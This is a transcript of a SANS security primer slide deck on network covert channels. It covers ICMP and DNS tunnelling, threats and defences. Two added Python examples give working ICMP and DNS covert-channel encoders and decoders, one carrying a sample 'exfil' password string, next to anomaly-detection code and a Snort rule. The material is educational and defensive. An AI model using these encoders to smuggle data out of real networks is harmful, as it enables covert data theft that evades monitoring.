Covert Channels: A Primer for Security Professionals
Erik Couture, GIAC GSEC, GCIH, GCIA
March 2011
SANS Technology Institute - Candidate for Master of Science Degree

Slide 2: Definition and Origin
• 3 types of information hiding
  – Cryptography - make the message unreadable
  – Steganography - hide the message in another message
  – Metaferography - hide the message in the carrier
• Easy to design, hard to detect

Slide 3: Covert Channels
• Clever misuse of network protocols
• Nearly undetectable
• Not all that common
“They’ll never see me coming!”

Slide 4: How it is done
• Modulate either:
  – the channel’s characteristics (timing, sizes, ordering)
  – the content (payloads, unused or free-form protocol fields)
• Do it without:
  – breaking protocol standards
  – making it look anomalous

Slide 5: ICMP
• An unspecified (variable-length) amount of data can be attached to an echo request or reply
• Sometimes blocked inbound, rarely outbound
• Ptunnel, Loki, 007Shell, Hans, more…
[Figures: what a PING looks like, and what a “PING” can look like]
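The following is an added example and not code from the slides or from any of the tools named on them. It shows the point of slides 4 and 5 in working form: a toy ICMP echo covert channel that modulates the content of a standards-compliant packet while keeping every packet the size and layout of a stock Linux ping, together with the simple content check that still exposes it. Assumptions: the stock ping payload is modelled as an 8-byte timestamp followed by the bytes 0x10..0x37 (56 bytes), a simplification of what iputils actually sends, and the identifier 0x1234 is arbitrary. Only ICMP bytes are built; nothing is sent on the wire.

```python
"""Toy ICMP echo covert channel (added example, not from the slides).
Assumption: stock ping payload = 8-byte timeval + bytes 0x10..0x37."""
import struct
import time

ICMP_ECHO_REQUEST = 8
STOCK_PAYLOAD_LEN = 56            # `ping` default data size on Linux
CHUNK = STOCK_PAYLOAD_LEN - 8     # message bytes per packet; the timestamp stays real


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over header + payload."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_request(ident: int, seq: int, payload: bytes) -> bytes:
    """ICMP type 8 / code 0 header with a valid checksum (no IP header)."""
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident, seq) + payload


def stock_ping_payload(ts: float = 0.0) -> bytes:
    """What a normal ping carries (simplified): a timeval, then 0x10, 0x11, ... 0x37."""
    secs = int(ts)
    usecs = int((ts - secs) * 1_000_000)
    pattern = bytes(range(0x10, 0x10 + STOCK_PAYLOAD_LEN - 8))
    return struct.pack("<II", secs, usecs) + pattern


def encode_message(msg: bytes, ident: int = 0x1234) -> list:
    """Spread msg over echo requests that match stock ping in size and layout.
    A 2-byte length prefix tells the receiver where the message ends; space
    left in the last packet is filled with the normal pattern bytes."""
    body = struct.pack("!H", len(msg)) + msg
    packets = []
    for seq, off in enumerate(range(0, len(body), CHUNK), start=1):
        chunk = body[off:off + CHUNK]
        filler = stock_ping_payload()[8 + len(chunk):]
        payload = stock_ping_payload(time.time())[:8] + chunk + filler
        packets.append(build_echo_request(ident, seq, payload))
    return packets


def parse_echo(packet: bytes):
    """Return (type, ident, seq, payload); a valid packet checksums to zero."""
    if icmp_checksum(packet) != 0:
        raise ValueError("bad ICMP checksum")
    typ, _code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return typ, ident, seq, packet[8:]


def decode_message(packets) -> bytes:
    """Receiver side: reorder by sequence number and strip the filler."""
    parts = {}
    for pkt in packets:
        typ, _ident, seq, payload = parse_echo(pkt)
        if typ == ICMP_ECHO_REQUEST:
            parts[seq] = payload[8:8 + CHUNK]
    body = b"".join(parts[s] for s in sorted(parts))
    (length,) = struct.unpack("!H", body[:2])
    return body[2:2 + length]


def looks_like_stock_ping(packet: bytes) -> bool:
    """Size alone passes a filter; comparing the pattern bytes exposes the channel."""
    _typ, _ident, _seq, payload = parse_echo(packet)
    return (len(payload) == STOCK_PAYLOAD_LEN
            and payload[8:] == stock_ping_payload()[8:])


if __name__ == "__main__":
    pkts = encode_message(b"exfil: db password = hunter2")
    print(len(pkts), "packet(s) of", len(pkts[0]), "bytes each")
    print(decode_message(pkts))
    print("stock-looking?", [looks_like_stock_ping(p) for p in pkts])
```

The covert packets are 64 bytes like a default ping and carry a correct checksum, so a size or rate rule sees nothing unusual; only comparing the data bytes against what the local ping implementation really sends catches them, which is why the slide's "block outgoing ICMP" advice is the cheaper control where it is acceptable.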
Slide 6: DNS
• Generally allowed through network protective devices
• Data is carried in the query name itself, e.g. http://Dsf6tas6df5f5d7f5adsf8a6d56a5d7.domain.com
• OzymanDNS, NSTX, dns2tcp

Slide 7: Future Threats
• IPv6
  – v00d00N3t - fully featured ICMPv6 covert channel
• Application layer
  – VoIP, mail, file transfer
• Layer 2
  – 802.11, ARP
• Using covert channels to break out of software sandboxes

Slide 8: Covert Channel Design Considerations
• Ease of detection
• Ease of implementation
• Carrier availability
• Bandwidth
• Reliability

Slide 9: Defensive practices
• Firewall
  – Block outgoing ICMP
  – Block DNS queries other than those from the internal proxy/resolver
• Snort rules
  – Spotting known signatures, e.g. (rule truncated on the slide):
    alert udp any any -> any 53 (content:"|00 00 29 10 00 00 00 80 00 00 00|".....
    (the bytes are an EDNS0 OPT record: type 0x0029, UDP payload size 4096, DO flag set, no data)
  – Exploit specific, as these things are
• Anomaly detection
  – Spot unusual spikes in DNS traffic on port 53
  – Frequent, oversized DNS TXT records
  – Any anomalous behavior (How hard is that?!)
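The following is an added example, not code from the slides or from OzymanDNS, NSTX or dns2tcp. It serves two slides at once: the DNS slide (how data rides in the query name, as in the Dsf6tas6... example) and the Defensive practices slide (the anomaly checks for long high-entropy names and oversized TXT answers, run over resolver log lines). Assumptions: the tunnel domain is the slide's placeholder domain.com; the log format 'src=... qname=... qtype=... rsize=...' and all sample lines are constructed for this example and are not any real resolver's format; the thresholds are illustrative; and the "registered domain" is simplified to the last two labels of a name.

```python
"""Toy DNS covert channel plus the anomaly checks from the Defensive practices
slide (added example, not from the slides). Log format and thresholds are
constructed for illustration."""
import base64
import collections
import hashlib
import math

MAX_LABEL = 63      # RFC 1035 label limit
MAX_NAME = 253      # practical limit for a name in presentation format
DATA_LABELS = 3     # payload labels per query


def to_b32(data: bytes) -> str:
    # base32 is case-insensitive and alphanumeric, so it survives resolvers
    # that lowercase names; '=' padding is dropped and restored on decode.
    return base64.b32encode(data).decode("ascii").rstrip("=").lower()


def from_b32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode_queries(data: bytes, domain: str) -> list:
    """Client side: names like s0001.<b32>.<b32>.<b32>.domain. The sequence
    label keeps order and stops resolvers from caching a repeated chunk."""
    text = to_b32(data)
    step = DATA_LABELS * MAX_LABEL
    names = []
    for seq, off in enumerate(range(0, len(text), step)):
        piece = text[off:off + step]
        labels = [piece[i:i + MAX_LABEL] for i in range(0, len(piece), MAX_LABEL)]
        name = ".".join([f"s{seq:04x}", *labels, domain])
        if len(name) > MAX_NAME:
            raise ValueError("domain too long for %d data labels" % DATA_LABELS)
        names.append(name)
    return names


def decode_queries(names, domain: str) -> bytes:
    """Authoritative server side: reassemble in sequence order, ignore other names."""
    suffix = "." + domain.lower()
    pieces = {}
    for name in names:
        name = name.lower()
        if not name.endswith(suffix):
            continue
        labels = name[:-len(suffix)].split(".")
        pieces[int(labels[0][1:], 16)] = "".join(labels[1:])
    return from_b32("".join(pieces[s] for s in sorted(pieces)))


def shannon_entropy(text: str) -> float:
    n = len(text)
    if not n:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in collections.Counter(text).values())


def payload_part(qname: str) -> str:
    """Everything left of the registered domain, where a tunnel carries data.
    Simplification: the registered domain is taken to be the last two labels."""
    return "".join(qname.lower().rstrip(".").split(".")[:-2])


def parse_log(lines):
    """Constructed format: 'src=<ip> qname=<name> qtype=<type> rsize=<answer bytes>'."""
    records = []
    for line in lines:
        if line.strip():
            fields = dict(kv.split("=", 1) for kv in line.split())
            fields["rsize"] = int(fields["rsize"])
            records.append(fields)
    return records


def analyse(records, min_len=40, min_entropy=3.5, txt_limit=255):
    """Per-source counters; only sources that trip a check are returned."""
    per_src = collections.defaultdict(lambda: {"queries": 0, "suspicious": 0, "big_txt": 0})
    for r in records:
        stats = per_src[r["src"]]
        stats["queries"] += 1
        data = payload_part(r["qname"])
        if len(data) >= min_len and shannon_entropy(data) >= min_entropy:
            stats["suspicious"] += 1          # long, random-looking name
        if r["qtype"] == "TXT" and r["rsize"] > txt_limit:
            stats["big_txt"] += 1             # oversized TXT reply (downstream data)
    return {src: s for src, s in per_src.items() if s["suspicious"] or s["big_txt"]}


# Constructed sample: ordinary lookups from one host, a tunnel from another.
NORMAL_LOG = """\
src=10.0.0.5 qname=www.google.com qtype=A rsize=60
src=10.0.0.5 qname=e3191.dscc.akamaiedge.net qtype=A rsize=72
src=10.0.0.5 qname=_dmarc.example.org qtype=TXT rsize=110
src=10.0.0.5 qname=ec2-54-12-34-56.us-west-2.compute.amazonaws.com qtype=A rsize=90
""".splitlines()
SECRET = hashlib.sha256(b"constructed payload").digest() * 8   # 256 pseudo-random bytes
TUNNEL_LOG = [f"src=10.0.0.7 qname={q} qtype=TXT rsize=900"
              for q in encode_queries(SECRET, "domain.com")]


def report():
    return analyse(parse_log(NORMAL_LOG + TUNNEL_LOG))


if __name__ == "__main__":
    for src, stats in report().items():
        print(src, stats)
```

Note that the entropy and length checks are heuristics: long but legitimate CDN and cloud hostnames sit close to the thresholds, and a tunnel that sends short, low-entropy chunks slowly (the "low and slow" channel of the later slide) slips under them, which is the volume dilemma the deck keeps returning to.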
Slide 10: Defensive R&D
• Statistical analysis
  – Proven to work in theory
• Active wardens
  – Full scan and rewrite of traffic
  – Resource intensive

Slide 11: The Threat
• Cyber criminals (financial data)
• Cyber-warriors (political/military)
• Corporate espionage (IP theft)
• Hacktivists (idealism)
• Individual hackers (fame/thrill)
• Spammers (ad distribution)

Slide 12: Hypothetical ‘Smart’ Covert Channel
• STUXNET-like scenario
  – High-value target
  – Motivated and resourced attacker
• Built-in recon ability
• Protocol flexibility
• Low and slow
• Virtually undetectable

Slide 13: Why not more common?
• Benefits vs limitations
• ‘Signal to noise ratio’
[Chart: covertness (high to low) plotted against throughput (low to high): the more data a channel moves, the less covert it is]

Slide 14: For Good not Evil?
• Can allow oppressed people to get through government firewalls/filters
• Back to the volume dilemma

Slide 15: Summary
• Covert channels are:
  – the death of perimeter security?
  – not inconceivable, but not a high priority for most
• What to do?
  – Focus on the fundamentals and the “low hanging…”
  – Implement defense in depth, in line with your threat/risk assessment and the SANS ‘20 Critical Security Controls’

References and more: please see my paper in the SANS Reading Room:
www.sans.org/reading_room/whitepapers/detection/covert-channels_33413